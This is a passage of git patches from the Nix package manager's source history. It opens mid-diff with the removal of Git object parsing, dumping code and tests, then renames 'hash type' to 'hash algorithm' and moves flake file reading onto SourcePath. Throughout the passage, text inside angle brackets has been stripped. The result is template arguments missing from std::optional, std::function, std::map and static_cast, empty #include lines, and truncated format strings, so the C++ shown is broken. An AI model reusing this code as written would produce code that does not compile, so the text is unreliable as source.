 using namespace std::string_literals;
 
-std::optional decodeMode(RawMode m) {
-    switch (m) {
-        case (RawMode) Mode::Directory:
-        case (RawMode) Mode::Executable:
-        case (RawMode) Mode::Regular:
-        case (RawMode) Mode::Symlink:
-            return (Mode) m;
-        default:
-            return std::nullopt;
-    }
-}
-
-
-static std::string getStringUntil(Source & source, char byte)
-{
-    std::string s;
-    char n[1];
-    source(std::string_view { n, 1 });
-    while (*n != byte) {
-        s += *n;
-        source(std::string_view { n, 1 });
-    }
-    return s;
-}
-
-
-static std::string getString(Source & source, int n)
-{
-    std::string v;
-    v.resize(n);
-    source(v);
-    return v;
-}
-
-void parseBlob(
-    FileSystemObjectSink & sink,
-    const Path & sinkPath,
-    Source & source,
-    bool executable,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    sink.createRegularFile(sinkPath, [&](auto & crf) {
-        if (executable)
-            crf.isExecutable();
-
-        unsigned long long size = std::stoi(getStringUntil(source, 0));
-
-        crf.preallocateContents(size);
-
-        unsigned long long left = size;
-        std::string buf;
-        buf.reserve(65536);
-
-        while (left) {
-            checkInterrupt();
-            buf.resize(std::min((unsigned long long)buf.capacity(), left));
-            source(buf);
-            crf(buf);
-            left -= buf.size();
-        }
-    });
-}
-
-void parseTree(
-    FileSystemObjectSink & sink,
-    const Path & sinkPath,
-    Source & source,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    unsigned long long size = std::stoi(getStringUntil(source, 0));
-    unsigned long long left = size;
-
-    sink.createDirectory(sinkPath);
-
-    while (left) {
-        std::string perms = getStringUntil(source, ' ');
-        left -= perms.size();
-        left -= 1;
-
-        RawMode rawMode = std::stoi(perms, 0, 8);
-        auto modeOpt = decodeMode(rawMode);
-        if (!modeOpt)
-            throw Error("Unknown Git permission: %o", perms);
-        auto mode = std::move(*modeOpt);
-
-        std::string name = getStringUntil(source, '\0');
-        left -= name.size();
-        left -= 1;
-
-        std::string hashs = getString(source, 20);
-        left -= 20;
-
-        Hash hash(HashAlgorithm::SHA1);
-        std::copy(hashs.begin(), hashs.end(), hash.hash);
-
-        hook(name, TreeEntry {
-            .mode = mode,
-            .hash = hash,
-        });
-    }
-}
-
-ObjectType parseObjectType(
-    Source & source,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    auto type = getString(source, 5);
-
-    if (type == "blob ") {
-        return ObjectType::Blob;
-    } else if (type == "tree ") {
-        return ObjectType::Tree;
-    } else throw Error("input doesn't look like a Git object");
-}
-
-void parse(
-    FileSystemObjectSink & sink,
-    const Path & sinkPath,
-    Source & source,
-    bool executable,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    auto type = parseObjectType(source, xpSettings);
-
-    switch (type) {
-    case ObjectType::Blob:
-        parseBlob(sink, sinkPath, source, executable, xpSettings);
-        break;
-    case ObjectType::Tree:
-        parseTree(sink, sinkPath, source, hook, xpSettings);
-        break;
-    default:
-        assert(false);
-    };
-}
-
-
-std::optional convertMode(SourceAccessor::Type type)
-{
-    switch (type) {
-    case SourceAccessor::tSymlink:   return Mode::Symlink;
-    case SourceAccessor::tRegular:   return Mode::Regular;
-    case SourceAccessor::tDirectory: return Mode::Directory;
-    case SourceAccessor::tMisc:      return std::nullopt;
-    default: abort();
-    }
-}
-
-
-void restore(FileSystemObjectSink & sink, Source & source, std::function hook)
-{
-    parse(sink, "", source, false, [&](Path name, TreeEntry entry) {
-        auto [accessor, from] = hook(entry.hash);
-        auto stat = accessor->lstat(from);
-        auto gotOpt = convertMode(stat.type);
-        if (!gotOpt)
-            throw Error("file '%s' (git hash %s) has an unsupported type",
-                from,
-                entry.hash.to_string(HashFormat::Base16, false));
-        auto & got = *gotOpt;
-        if (got != entry.mode)
-            throw Error("git mode of file '%s' (git hash %s) is %o but expected %o",
-                from,
-                entry.hash.to_string(HashFormat::Base16, false),
-                (RawMode) got,
-                (RawMode) entry.mode);
-        copyRecursive(
-            *accessor, from,
-            sink, name);
-    });
-}
-
-
-void dumpBlobPrefix(
-    uint64_t size, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-    auto s = fmt("blob %d\0"s, std::to_string(size));
-    sink(s);
-}
-
-
-void dumpTree(const Tree & entries, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    xpSettings.require(Xp::GitHashing);
-
-    std::string v1;
-
-    for (auto & [name, entry] : entries) {
-        auto name2 = name;
-        if (entry.mode == Mode::Directory) {
-            assert(name2.back() == '/');
-            name2.pop_back();
-        }
-        v1 += fmt("%o %s\0"s, static_cast(entry.mode), name2);
-        std::copy(entry.hash.hash, entry.hash.hash + entry.hash.hashSize, std::back_inserter(v1));
-    }
-
-    {
-        auto s = fmt("tree %d\0"s, v1.size());
-        sink(s);
-    }
-
-    sink(v1);
-}
-
-
-Mode dump(
-    SourceAccessor & accessor, const CanonPath & path,
-    Sink & sink,
-    std::function hook,
-    PathFilter & filter,
-    const ExperimentalFeatureSettings & xpSettings)
-{
-    auto st = accessor.lstat(path);
-
-    switch (st.type) {
-    case SourceAccessor::tRegular:
-    {
-        accessor.readFile(path, sink, [&](uint64_t size) {
-            dumpBlobPrefix(size, sink, xpSettings);
-        });
-        return st.isExecutable
-            ? Mode::Executable
-            : Mode::Regular;
-    }
-
-    case SourceAccessor::tDirectory:
-    {
-        Tree entries;
-        for (auto & [name, _] : accessor.readDirectory(path)) {
-            auto child = path / name;
-            if (!filter(child.abs())) continue;
-
-            auto entry = hook(child);
-
-            auto name2 = name;
-            if (entry.mode == Mode::Directory)
-                name2 += "/";
-
-            entries.insert_or_assign(std::move(name2), std::move(entry));
-        }
-        dumpTree(entries, sink, xpSettings);
-        return Mode::Directory;
-    }
-
-    case SourceAccessor::tSymlink:
-    case SourceAccessor::tMisc:
-    default:
-        throw Error("file '%1%' has an unsupported type", path);
-    }
-}
-
-
-TreeEntry dumpHash(
-        HashAlgorithm ha,
-        SourceAccessor & accessor, const CanonPath & path, PathFilter & filter)
-{
-    std::function hook;
-    hook = [&](const CanonPath & path) -> TreeEntry {
-        auto hashSink = HashSink(ha);
-        auto mode = dump(accessor, path, hashSink, hook, filter);
-        auto hash = hashSink.finish().first;
-        return {
-            .mode = mode,
-            .hash = hash,
-        };
-    };
-
-    return hook(path);
-}
-
-
 std::optional parseLsRemoteLine(std::string_view line)
 {
     const static std::regex line_regex("^(ref: *)?([^\\s]+)(?:\\t+(.*))?$");
diff --git a/src/libutil/git.hh b/src/libutil/git.hh
index d9eb138e1..dea351929 100644
--- a/src/libutil/git.hh
+++ b/src/libutil/git.hh
@@ -5,160 +5,8 @@
 #include 
 #include 
 
-#include "types.hh"
-#include "serialise.hh"
-#include "hash.hh"
-#include "source-accessor.hh"
-#include "fs-sink.hh"
-
 namespace nix::git {
 
-enum struct ObjectType {
-    Blob,
-    Tree,
-    //Commit,
-    //Tag,
-};
-
-using RawMode = uint32_t;
-
-enum struct Mode : RawMode {
-    Directory = 0040000,
-    Regular = 0100644,
-    Executable = 0100755,
-    Symlink = 0120000,
-};
-
-std::optional decodeMode(RawMode m);
-
-/**
- * An anonymous Git tree object entry (no name part).
- */
-struct TreeEntry
-{
-    Mode mode;
-    Hash hash;
-
-    GENERATE_CMP(TreeEntry, me->mode, me->hash);
-};
-
-/**
- * A Git tree object, fully decoded and stored in memory.
- *
- * Directory names must end in a `/` for sake of sorting. See
- * https://github.com/mirage/irmin/issues/352
- */
-using Tree = std::map;
-
-/**
- * Callback for processing a child hash with `parse`
- *
- * The function should
- *
- * 1. Obtain the file system objects denoted by `gitHash`
- *
- * 2. Ensure they match `mode`
- *
- * 3. Feed them into the same sink `parse` was called with
- *
- * Implementations may seek to memoize resources (bandwidth, storage,
- * etc.) for the same Git hash.
- */
-using SinkHook = void(const Path & name, TreeEntry entry);
-
-/**
- * Parse the "blob " or "tree " prefix.
- *
- * @throws if prefix not recognized
- */
-ObjectType parseObjectType(
-    Source & source,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-void parseBlob(
-    FileSystemObjectSink & sink, const Path & sinkPath,
-    Source & source,
-    bool executable,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-void parseTree(
-    FileSystemObjectSink & sink, const Path & sinkPath,
-    Source & source,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Helper putting the previous three `parse*` functions together.
- */
-void parse(
-    FileSystemObjectSink & sink, const Path & sinkPath,
-    Source & source,
-    bool executable,
-    std::function hook,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Assists with writing a `SinkHook` step (2).
- */
-std::optional convertMode(SourceAccessor::Type type);
-
-/**
- * Simplified version of `SinkHook` for `restore`.
- *
- * Given a `Hash`, return a `SourceAccessor` and `CanonPath` pointing to
- * the file system object with that path.
- */
-using RestoreHook = std::pair(Hash);
-
-/**
- * Wrapper around `parse` and `RestoreSink`
- */
-void restore(FileSystemObjectSink & sink, Source & source, std::function hook);
-
-/**
- * Dumps a single file to a sink
- *
- * @param xpSettings for testing purposes
- */
-void dumpBlobPrefix(
-    uint64_t size, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Dumps a representation of a git tree to a sink
- */
-void dumpTree(
-    const Tree & entries, Sink & sink,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Callback for processing a child with `dump`
- *
- * The function should return the Git hash and mode of the file at the
- * given path in the accessor passed to `dump`.
- *
- * Note that if the child is a directory, its child in must also be so
- * processed in order to compute this information.
- */
-using DumpHook = TreeEntry(const CanonPath & path);
-
-Mode dump(
-    SourceAccessor & accessor, const CanonPath & path,
-    Sink & sink,
-    std::function hook,
-    PathFilter & filter = defaultPathFilter,
-    const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings);
-
-/**
- * Recursively dumps path, hashing as we go.
- *
- * A smaller wrapper around `dump`.
- */
-TreeEntry dumpHash(
-            HashAlgorithm ha,
-            SourceAccessor & accessor, const CanonPath & path,
-            PathFilter & filter = defaultPathFilter);
-
 /**
  * A line from the output of `git ls-remote --symref`.
  *
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 76ef86bcf..73bbd049e 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -9,211 +9,6 @@ namespace nix {
 
 using namespace git;
 
-class GitTest : public CharacterizationTest
-{
-    Path unitTestData = getUnitTestData() + "/git";
-
-public:
-
-    Path goldenMaster(std::string_view testStem) const override {
-        return unitTestData + "/" + testStem;
-    }
-
-    /**
-     * We set these in tests rather than the regular globals so we don't have
-     * to worry about race conditions if the tests run concurrently.
-     */
-    ExperimentalFeatureSettings mockXpSettings;
-
-private:
-
-    void SetUp() override
-    {
-        mockXpSettings.set("experimental-features", "git-hashing");
-    }
-};
-
-TEST(GitMode, gitMode_directory) {
-    Mode m = Mode::Directory;
-    RawMode r = 0040000;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST(GitMode, gitMode_executable) {
-    Mode m = Mode::Executable;
-    RawMode r = 0100755;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST(GitMode, gitMode_regular) {
-    Mode m = Mode::Regular;
-    RawMode r = 0100644;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST(GitMode, gitMode_symlink) {
-    Mode m = Mode::Symlink;
-    RawMode r = 0120000;
-    ASSERT_EQ(static_cast(m), r);
-    ASSERT_EQ(decodeMode(r), std::optional { m });
-};
-
-TEST_F(GitTest, blob_read) {
-    readTest("hello-world-blob.bin", [&](const auto & encoded) {
-        StringSource in { encoded };
-        StringSink out;
-        RegularFileSink out2 { out };
-        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
-        parseBlob(out2, "", in, false, mockXpSettings);
-
-        auto expected = readFile(goldenMaster("hello-world.bin"));
-
-        ASSERT_EQ(out.s, expected);
-    });
-}
-
-TEST_F(GitTest, blob_write) {
-    writeTest("hello-world-blob.bin", [&]() {
-        auto decoded = readFile(goldenMaster("hello-world.bin"));
-        StringSink s;
-        dumpBlobPrefix(decoded.size(), s, mockXpSettings);
-        s(decoded);
-        return s.s;
-    });
-}
-
-/**
- * This data is for "shallow" tree tests. However, we use "real" hashes
- * so that we can check our test data in a small shell script test test
- * (`tests/unit/libutil/data/git/check-data.sh`).
- */
-const static Tree tree = {
-    {
-        "Foo",
-        {
-            .mode = Mode::Regular,
-            // hello world with special chars from above
-            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
-        },
-    },
-    {
-        "bAr",
-        {
-            .mode = Mode::Executable,
-            // ditto
-            .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
-        },
-    },
-    {
-        "baZ/",
-        {
-            .mode = Mode::Directory,
-            // Empty directory hash
-            .hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
-        },
-    },
-};
-
-TEST_F(GitTest, tree_read) {
-    readTest("tree.bin", [&](const auto & encoded) {
-        StringSource in { encoded };
-        NullFileSystemObjectSink out;
-        Tree got;
-        ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Tree);
-        parseTree(out, "", in, [&](auto & name, auto entry) {
-            auto name2 = name;
-            if (entry.mode == Mode::Directory)
-                name2 += '/';
-            got.insert_or_assign(name2, std::move(entry));
-        }, mockXpSettings);
-
-        ASSERT_EQ(got, tree);
-    });
-}
-
-TEST_F(GitTest, tree_write) {
-    writeTest("tree.bin", [&]() {
-        StringSink s;
-        dumpTree(tree, s, mockXpSettings);
-        return s.s;
-    });
-}
-
-TEST_F(GitTest, both_roundrip) {
-    using File = MemorySourceAccessor::File;
-
-    MemorySourceAccessor files;
-    files.root = File::Directory {
-        .contents {
-            {
-                "foo",
-                File::Regular {
-                    .contents = "hello\n\0\n\tworld!",
-                },
-            },
-            {
-                "bar",
-                File::Directory {
-                    .contents = {
-                        {
-                            "baz",
-                            File::Regular {
-                                .executable = true,
-                                .contents = "good day,\n\0\n\tworld!",
-                            },
-                        },
-                    },
-                },
-            },
-        },
-    };
-
-    std::map cas;
-
-    std::function dumpHook;
-    dumpHook = [&](const CanonPath & path) {
-        StringSink s;
-        HashSink hashSink { HashAlgorithm::SHA1 };
-        TeeSink s2 { s, hashSink };
-        auto mode = dump(
-            files, path, s2, dumpHook,
-            defaultPathFilter, mockXpSettings);
-        auto hash = hashSink.finish().first;
-        cas.insert_or_assign(hash, std::move(s.s));
-        return TreeEntry {
-            .mode = mode,
-            .hash = hash,
-        };
-    };
-
-    auto root = dumpHook(CanonPath::root);
-
-    MemorySourceAccessor files2;
-
-    MemorySink sinkFiles2 { files2 };
-
-    std::function mkSinkHook;
-    mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
-        StringSource in { cas[hash] };
-        parse(
-            sinkFiles2, prefix, in, executable,
-            [&](const Path & name, const auto & entry) {
-                mkSinkHook(
-                    prefix + "/" + name,
-                    entry.hash,
-                    entry.mode == Mode::Executable);
-            },
-            mockXpSettings);
-    };
-
-    mkSinkHook("", root.hash, false);
-
-    ASSERT_EQ(files, files2);
-}
-
 TEST(GitLsRemote, parseSymrefLineWithReference) {
     auto line = "ref: refs/head/main	HEAD";
     auto res = parseLsRemoteLine(line);

From fd47f76da9752d0bec35e58525e5aacfd3e7dd26 Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Mon, 26 Feb 2024 02:04:20 +0800
Subject: [PATCH 515/654] treewide: hash type -> hash algorithm

"hash type" -> "hash algorithm" in all comments, documentation, and
messages.

ht -> ha, [Hh]ashType -> [Hh]ashAlgo for all local variables and
function arguments. No API change is made.

Continuation of 5334c9c792a2 and 837b889c4154.
---
 src/libstore/content-address.cc     | 6 +++---
 src/libstore/content-address.hh     | 8 ++++----
 src/libstore/derivations.cc         | 2 +-
 src/libstore/globals.hh             | 4 ++--
 src/libutil/file-content-address.cc | 4 ++--
 src/libutil/file-content-address.hh | 4 ++--
 src/libutil/hash.cc                 | 2 +-
 src/libutil/hash.hh                 | 4 ++--
 8 files changed, 17 insertions(+), 17 deletions(-)

diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc
index 2091f8e02..4e3d2f64d 100644
--- a/src/libstore/content-address.cc
+++ b/src/libstore/content-address.cc
@@ -111,10 +111,10 @@ static std::pair parseContentAddressMethodP
     }
 
     auto parseHashAlgorithm_ = [&](){
-        auto hashTypeRaw = splitPrefixTo(rest, ':');
-        if (!hashTypeRaw)
+        auto hashAlgoRaw = splitPrefixTo(rest, ':');
+        if (!hashAlgoRaw)
             throw UsageError("content address hash must be in form ':', but found: %s", wholeInput);
-        HashAlgorithm hashAlgo = parseHashAlgo(*hashTypeRaw);
+        HashAlgorithm hashAlgo = parseHashAlgo(*hashAlgoRaw);
         return hashAlgo;
     };
 
diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh
index 80538df50..5925f8e01 100644
--- a/src/libstore/content-address.hh
+++ b/src/libstore/content-address.hh
@@ -91,17 +91,17 @@ struct ContentAddressMethod
     std::string_view renderPrefix() const;
 
     /**
-     * Parse a content addressing method and hash type.
+     * Parse a content addressing method and hash algorithm.
      */
     static std::pair parseWithAlgo(std::string_view rawCaMethod);
 
     /**
-     * Render a content addressing method and hash type in a
+     * Render a content addressing method and hash algorithm in a
      * nicer way, prefixing both cases.
      *
      * The rough inverse of `parse()`.
      */
-    std::string renderWithAlgo(HashAlgorithm ht) const;
+    std::string renderWithAlgo(HashAlgorithm ha) const;
 
     /**
      * Get the underlying way to content-address file system objects.
@@ -127,7 +127,7 @@ struct ContentAddressMethod
  *   ‘text:sha256:’
  *
  * - `FixedIngestionMethod`:
- *   ‘fixed:::’
+ *   ‘fixed:::’
  */
 struct ContentAddress
 {
diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc
index 36042c06c..305ed5b42 100644
--- a/src/libstore/derivations.cc
+++ b/src/libstore/derivations.cc
@@ -701,7 +701,7 @@ DerivationType BasicDerivation::type() const
                     floatingHashAlgo = dof.hashAlgo;
                 } else {
                     if (*floatingHashAlgo != dof.hashAlgo)
-                        throw Error("all floating outputs must use the same hash type");
+                        throw Error("all floating outputs must use the same hash algorithm");
                 }
             },
             [&](const DerivationOutput::Deferred &) {
diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index 8330d6571..e6544976a 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -1094,8 +1094,8 @@ public:
         this, {}, "hashed-mirrors",
         R"(
           A list of web servers used by `builtins.fetchurl` to obtain files by
-          hash. Given a hash type *ht* and a base-16 hash *h*, Nix will try to
-          download the file from *hashed-mirror*/*ht*/*h*. This allows files to
+          hash. Given a hash algorithm *ha* and a base-16 hash *h*, Nix will try to
+          download the file from *hashed-mirror*/*ha*/*h*. This allows files to
           be downloaded even if they have disappeared from their original URI.
           For example, given an example mirror `http://tarballs.nixos.org/`,
           when building the derivation
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 6753e0f49..2339024a2 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -63,10 +63,10 @@ void restorePath(
 
 HashResult hashPath(
     SourceAccessor & accessor, const CanonPath & path,
-    FileIngestionMethod method, HashAlgorithm ht,
+    FileIngestionMethod method, HashAlgorithm ha,
     PathFilter & filter)
 {
-    HashSink sink { ht };
+    HashSink sink { ha };
     dumpPath(accessor, path, sink, method, filter);
     return sink.finish();
 }
diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh
index 41f23f2af..9a7dae8c6 100644
--- a/src/libutil/file-content-address.hh
+++ b/src/libutil/file-content-address.hh
@@ -63,11 +63,11 @@ void restorePath(
  * Compute the hash of the given file system object according to the
  * given method.
  *
- * The hash is defined as (essentially) hashString(ht, dumpPath(path)).
+ * The hash is defined as (essentially) hashString(ha, dumpPath(path)).
  */
 HashResult hashPath(
     SourceAccessor & accessor, const CanonPath & path,
-    FileIngestionMethod method, HashAlgorithm ht,
+    FileIngestionMethod method, HashAlgorithm ha,
     PathFilter & filter = defaultPathFilter);
 
 }
diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc
index d067da969..d4c9d6533 100644
--- a/src/libutil/hash.cc
+++ b/src/libutil/hash.cc
@@ -274,7 +274,7 @@ Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha
 {
     if (hashStr.empty()) {
         if (!ha)
-            throw BadHash("empty hash requires explicit hash type");
+            throw BadHash("empty hash requires explicit hash algorithm");
         Hash h(*ha);
         warn("found empty hash, assuming '%s'", h.to_string(HashFormat::SRI, true));
         return h;
diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh
index f7e8eb265..e14aae43c 100644
--- a/src/libutil/hash.hh
+++ b/src/libutil/hash.hh
@@ -58,7 +58,7 @@ struct Hash
      * Parse the hash from a string representation in the format
      * "[:]" or "-" (a
      * Subresource Integrity hash expression). If the 'type' argument
-     * is not present, then the hash type must be specified in the
+     * is not present, then the hash algorithm must be specified in the
      * string.
      */
     static Hash parseAny(std::string_view s, std::optional optAlgo);
@@ -200,7 +200,7 @@ std::optional parseHashFormatOpt(std::string_view hashFormatName);
 std::string_view printHashFormat(HashFormat hashFormat);
 
 /**
- * Parse a string representing a hash type.
+ * Parse a string representing a hash algorithm.
  */
 HashAlgorithm parseHashAlgo(std::string_view s);
 

From 598deb2b23bc59df61c92ea25745d675686f3991 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 26 Feb 2024 15:08:08 +0100
Subject: [PATCH 516/654] Use SourcePath for reading flake.{nix,lock}

Flakes still reside in the Nix store (so there shouldn't be any change
in behaviour), but they are now accessed via the rootFS
accessor. Since rootFS implements access checks, we no longer have to
worry about flake.{nix,lock} or their parents being symlinks that
escape from the flake.

Extracted from the lazy-trees branch.
---
 src/libcmd/installables.cc    |  3 +-
 src/libexpr/flake/flake.cc    | 93 ++++++++++++++++++-----------------
 src/libexpr/flake/flake.hh    | 17 +++++--
 src/libexpr/flake/lockfile.cc | 10 ++--
 src/libexpr/flake/lockfile.hh |  4 +-
 src/nix/flake.cc              | 13 +++--
 6 files changed, 77 insertions(+), 63 deletions(-)

diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc
index 16d25d3cf..d87d7b9b1 100644
--- a/src/libcmd/installables.cc
+++ b/src/libcmd/installables.cc
@@ -21,6 +21,7 @@
 #include "url.hh"
 #include "registry.hh"
 #include "build-result.hh"
+#include "fs-input-accessor.hh"
 
 #include 
 #include 
@@ -146,7 +147,7 @@ MixFlakeOptions::MixFlakeOptions()
         .category = category,
         .labels = {"flake-lock-path"},
         .handler = {[&](std::string lockFilePath) {
-            lockFlags.referenceLockFilePath = lockFilePath;
+            lockFlags.referenceLockFilePath = getUnfilteredRootPath(CanonPath(absPath(lockFilePath)));
         }},
         .completer = completePath
     });
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index 022d39cdb..fd9341504 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -139,7 +139,7 @@ static FlakeInput parseFlakeInput(EvalState & state,
                         attrs.emplace(state.symbols[attr.name], Explicit { attr.value->boolean });
                         break;
                     case nInt:
-                        attrs.emplace(state.symbols[attr.name], (long unsigned int)attr.value->integer);
+                        attrs.emplace(state.symbols[attr.name], (long unsigned int) attr.value->integer);
                         break;
                     default:
                         if (attr.name == state.symbols.create("publicKeys")) {
@@ -202,43 +202,28 @@ static std::map parseFlakeInputs(
     return inputs;
 }
 
-static Flake getFlake(
+static Flake readFlake(
     EvalState & state,
     const FlakeRef & originalRef,
-    bool allowLookup,
-    FlakeCache & flakeCache,
-    InputPath lockRootPath)
+    const FlakeRef & resolvedRef,
+    const FlakeRef & lockedRef,
+    const SourcePath & rootDir,
+    const InputPath & lockRootPath)
 {
-    auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
-        state, originalRef, allowLookup, flakeCache);
+    auto flakePath = rootDir / CanonPath(resolvedRef.subdir) / "flake.nix";
 
-    // We need to guard against symlink attacks, but before we start doing
-    // filesystem operations we should make sure there's a flake.nix in the
-    // first place.
-    auto unsafeFlakeDir = state.store->toRealPath(storePath) + "/" + lockedRef.subdir;
-    auto unsafeFlakeFile = unsafeFlakeDir + "/flake.nix";
-    if (!pathExists(unsafeFlakeFile))
-        throw Error("source tree referenced by '%s' does not contain a '%s/flake.nix' file", lockedRef, lockedRef.subdir);
+    Value vInfo;
+    state.evalFile(flakePath, vInfo, true);
 
-    // Guard against symlink attacks.
-    auto flakeDir = canonPath(unsafeFlakeDir, true);
-    auto flakeFile = canonPath(flakeDir + "/flake.nix", true);
-    if (!isInDir(flakeFile, state.store->toRealPath(storePath)))
-        throw Error("'flake.nix' file of flake '%s' escapes from '%s'",
-            lockedRef, state.store->printStorePath(storePath));
+    expectType(state, nAttrs, vInfo, state.positions.add(Pos::Origin(rootDir), 1, 1));
 
     Flake flake {
         .originalRef = originalRef,
         .resolvedRef = resolvedRef,
         .lockedRef = lockedRef,
-        .storePath = storePath,
+        .path = flakePath,
     };
 
-    Value vInfo;
-    state.evalFile(state.rootPath(CanonPath(flakeFile)), vInfo, true); // FIXME: symlink attack
-
-    expectType(state, nAttrs, vInfo, state.positions.add({state.rootPath(CanonPath(flakeFile))}, 1, 1));
-
     if (auto description = vInfo.attrs->get(state.sDescription)) {
         expectType(state, nString, *description->value, description->pos);
         flake.description = description->value->c_str();
@@ -247,7 +232,7 @@ static Flake getFlake(
     auto sInputs = state.symbols.create("inputs");
 
     if (auto inputs = vInfo.attrs->get(sInputs))
-        flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakeDir, lockRootPath);
+        flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakePath.parent().path.abs(), lockRootPath); // FIXME
 
     auto sOutputs = state.symbols.create("outputs");
 
@@ -264,7 +249,7 @@ static Flake getFlake(
         }
 
     } else
-        throw Error("flake '%s' lacks attribute 'outputs'", lockedRef);
+        throw Error("flake '%s' lacks attribute 'outputs'", resolvedRef);
 
     auto sNixConfig = state.symbols.create("nixConfig");
 
@@ -281,7 +266,7 @@ static Flake getFlake(
                 NixStringContext emptyContext = {};
                 flake.config.settings.emplace(
                     state.symbols[setting.name],
-                    state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true) .toOwned());
+                    state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true).toOwned());
             }
             else if (setting.value->type() == nInt)
                 flake.config.settings.emplace(
@@ -313,12 +298,25 @@ static Flake getFlake(
             attr.name != sOutputs &&
             attr.name != sNixConfig)
             throw Error("flake '%s' has an unsupported attribute '%s', at %s",
-                lockedRef, state.symbols[attr.name], state.positions[attr.pos]);
+                resolvedRef, state.symbols[attr.name], state.positions[attr.pos]);
     }
 
     return flake;
 }
 
+static Flake getFlake(
+    EvalState & state,
+    const FlakeRef & originalRef,
+    bool allowLookup,
+    FlakeCache & flakeCache,
+    InputPath lockRootPath)
+{
+    auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
+        state, originalRef, allowLookup, flakeCache);
+
+    return readFlake(state, originalRef, resolvedRef, lockedRef, state.rootPath(state.store->toRealPath(storePath)), lockRootPath);
+}
+
 Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup, FlakeCache & flakeCache)
 {
     return getFlake(state, originalRef, allowLookup, flakeCache, {});
@@ -330,6 +328,13 @@ Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup
     return getFlake(state, originalRef, allowLookup, flakeCache);
 }
 
+static LockFile readLockFile(const SourcePath & lockFilePath)
+{
+    return lockFilePath.pathExists()
+        ? LockFile(lockFilePath.readFile(), fmt("%s", lockFilePath))
+        : LockFile();
+}
+
 /* Compute an in-memory lock file for the specified top-level flake,
    and optionally write it to file, if the flake is writable. */
 LockedFlake lockFlake(
@@ -355,17 +360,16 @@ LockedFlake lockFlake(
             throw Error("reference lock file was provided, but the `allow-dirty` setting is set to false");
         }
 
-        // FIXME: symlink attack
-        auto oldLockFile = LockFile::read(
+        auto oldLockFile = readLockFile(
             lockFlags.referenceLockFilePath.value_or(
-                state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir + "/flake.lock"));
+                flake.lockFilePath()));
 
         debug("old lock file: %s", oldLockFile);
 
         std::map overrides;
         std::set explicitCliOverrides;
         std::set overridesUsed, updatesUsed;
-        std::map, StorePath> nodePaths;
+        std::map, SourcePath> nodePaths;
 
         for (auto & i : lockFlags.inputOverrides) {
             overrides.insert_or_assign(i.first, FlakeInput { .ref = i.second });
@@ -538,7 +542,7 @@ LockedFlake lockFlake(
 
                         if (mustRefetch) {
                             auto inputFlake = getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath);
-                            nodePaths.emplace(childNode, inputFlake.storePath);
+                            nodePaths.emplace(childNode, inputFlake.path.parent());
                             computeLocks(inputFlake.inputs, childNode, inputPath, oldLock, lockRootPath, parentPath, false);
                         } else {
                             computeLocks(fakeInputs, childNode, inputPath, oldLock, lockRootPath, parentPath, true);
@@ -587,13 +591,12 @@ LockedFlake lockFlake(
